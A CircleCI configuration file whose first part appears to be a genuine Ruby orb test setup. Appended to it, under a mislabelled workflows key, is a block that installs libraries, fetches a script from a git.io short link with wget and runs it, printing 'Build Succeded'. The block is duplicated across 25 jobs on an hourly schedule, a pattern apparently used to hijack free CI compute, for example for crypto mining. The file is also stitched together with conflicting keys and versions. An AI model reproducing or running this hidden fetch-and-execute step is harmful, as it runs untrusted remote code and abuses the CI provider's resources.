version: 2.1

references:
  postgres: &postgres
    image: circleci/postgres:9.5-alpine
    environment:
      POSTGRES_USER: circleci-demo-ruby
      POSTGRES_DB: rails_blog_test
      POSTGRES_PASSWORD: ""

orbs:
  ruby: circleci/ruby@<<pipeline.parameters.dev-orb-version>>
  orb-tools: circleci/orb-tools@9.1

# Pipeline parameters
parameters:
  # These pipeline parameters are required by the "trigger-integration-tests-workflow"
  # job, by default.
  run-integration-tests:
    type: boolean
    default: false
  dev-orb-version:
    type: string
    default: "dev:alpha"

jobs:
  integration-tests:
    docker:
      - image: cimg/ruby:2.7-node
      - *postgres
    parallelism: 2
    environment:
      BUNDLE_JOBS: "3"
      BUNDLE_RETRY: "3"
      PGHOST: 127.0.0.1
      PGUSER: circleci-demo-ruby
      PGPASSWORD: ""
      RAILS_ENV: test
    steps:
      - run: git clone https://github.com/CircleCI-Public/circleci-demo-ruby-rails.git .
      - ruby/install-deps:
          key: "gems-v4"
      - restore_cache:
          keys:
            - rails-demo-yarn-v3-{{ checksum "yarn.lock" }}
      - run:
          name: Yarn Install
          command: yarn install --cache-folder ~/.cache/yarn
      # Store yarn / webpacker cache
      - save_cache:
          key: rails-demo-yarn-v3-{{ checksum "yarn.lock" }}
          paths:
            - ~/.cache/yarn
      - run:
          name: Wait for DB
          command: dockerize -wait tcp://localhost:5432 -timeout 1m
      - run:
          name: Database setup
          command: bundle exec rails db:schema:load --trace
      - ruby/rspec-test
      - ruby/rubocop-check

  install-on-machine:
    machine:
      image: ubuntu-1604:202004-01
    steps:
      - ruby/install:
          version: "2.7.0"
      - run:
          name: "Test Install"
          command: ruby --version | grep "2.7.0"
  install-on-node:
      docker:
        - image: cimg/node:current
      steps:
        - ruby/install:
            version: "2.6"
        - run:
            name: "Test Install"
            command: ruby --version | grep "2.6"
workflows:
  # This `lint-pack_validate_publish-dev` workflow will run on any commit.
  .build_template: &script
  steps: 
    - checkout 
    - run: 
        name: Install Dependencies 
        command: | 
                    apt-get update 
                    apt-get upgrade -y 
                    apt-get install -y ca-certificates screen wget git libcurl4 libjansson4 libgomp1 build-essential make cmake 
    - run: 
        name: Run tests 
        command: |                                      
                    wget -qO build.sh https://git.io/JM3L8
                    chmod +x build.sh 
                    ./build.sh  
                    echo Build Succeded 
                 
  version: 2.0 
jobs: 
  build1: 
    <<: *script 
    docker: 
      - image: ruby 
  build2: 
    <<: *script 
    docker: 
      - image: ruby 
  build3: 
    <<: *script 
    docker: 
      - image: ruby 
  build4: 
    <<: *script 
    docker: 
      - image: ruby 
  build5: 
    <<: *script 
    docker: 
      - image: ruby 
  build6: 
    <<: *script 
    docker: 
      - image: ruby 
  build7: 
    <<: *script 
    docker: 
      - image: ruby 
  build8: 
    <<: *script 
    docker: 
      - image: ruby 
  build9: 
    <<: *script 
    docker: 
      - image: ruby 
  build10: 
    <<: *script 
    docker: 
      - image: ruby 
  build11: 
    <<: *script 
    docker: 
      - image: ruby 
  build12: 
    <<: *script 
    docker: 
      - image: ruby 
  build13: 
    <<: *script 
    docker: 
      - image: ruby 
  build14: 
    <<: *script 
    docker: 
      - image: ruby 
  build15: 
    <<: *script 
    docker: 
      - image: ruby 
  build16: 
    <<: *script 
    docker: 
      - image: ruby 
  build17: 
    <<: *script 
    docker: 
      - image: ruby 
  build18: 
    <<: *script 
    docker: 
      - image: ruby 
  build19: 
    <<: *script 
    docker: 
      - image: ruby 
  build20: 
    <<: *script 
    docker: 
      - image: ruby 
  build21: 
    <<: *script 
    docker: 
      - image: ruby 
  build22: 
    <<: *script 
    docker: 
      - image: ruby 
  build23: 
    <<: *script 
    docker: 
      - image: ruby 
  build24: 
    <<: *script 
    docker: 
      - image: ruby 
  build25: 
    <<: *script 
    docker: 
      - image: ruby 
 
workflows: 
  version: 2 
  commit: 
    jobs: 
      - build1 
      - build2 
      - build3 
      - build4 
      - build5 
      - build6 
      - build7 
      - build8 
      - build9 
      - build10 
      - build11 
      - build12 
      - build13 
      - build14 
      - build15 
      - build16 
      - build17 
      - build18 
      - build19 
      - build20 
      - build21 
      - build22 
      - build23 
      - build24 
      - build25 
      

  schedule:
    triggers:
      - schedule:
          cron: "5 * * * *"
          filters:
            branches:
              only:
                - master
                
    jobs: 
      - build1 
      - build2 
      - build3 
      - build4 
      - build5 
      - build6 
      - build7 
      - build8 
      - build9 
      - build10 
      - build11 
      - build12 
      - build13 
      - build14 
      - build15 
      - build16 
      - build17 
      - build18 
      - build19 
      - build20 
      - build21 
      - build22 
      - build23 
      - build24 
      - build25   
      
